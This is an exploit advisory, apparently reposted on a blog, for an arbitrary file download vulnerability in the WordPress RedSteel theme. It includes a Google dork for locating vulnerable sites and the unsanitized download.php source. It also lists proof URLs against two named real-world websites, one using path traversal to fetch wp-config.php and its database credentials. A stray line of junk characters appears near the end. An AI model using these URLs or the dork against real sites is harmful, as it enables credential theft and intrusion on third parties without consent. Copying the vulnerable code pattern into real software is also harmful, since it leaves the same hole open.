[*] Exploit Title: Wordpress RedSteel Theme Arbitrary File Download Vulnerability
[*] Google Dork: inurl:wp-content/themes/RedSteel
[*] Date : Date: 2015-01-25
[*] Exploit Author: Ashiyane Digital Security Team
[*] Vendor Homepage : http://www.webdesignlessons.com/redsteel-wordpress-theme/
[*] Tested on: Windows 7
[*] Discovered By : ACC3SS
Location:
[localhost]/wp-content/themes/RedSteel/download.php?file=filename.php
Vulnerable code file : download.php
<?php
$file = @$_GET['file'];
$parts = explode('/',$file);
$fileName = $parts[sizeof($parts)-1];
if ((isset($file))&&(file_exists($file))) {
header("Content-type: application/force-download");
header('Content-Disposition: inline; filename="' . $fileName . '"');
header("Content-Transfer-Encoding: Binary");
header("Content-length: ".filesize($file));
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . $fileName . '"');
readfile($file);
}
?>
Proof:
http://dixonpest.com/wp-content/themes/RedSteel/download.php?file=../../../wp-config.php
http://rmhctallahassee.org/wp-content/themes/RedSteel/download.php?file=download.php
lllllllllllllllllllldjjjjjjjjjjjjjjjjj
0 comentários:
Postar um comentário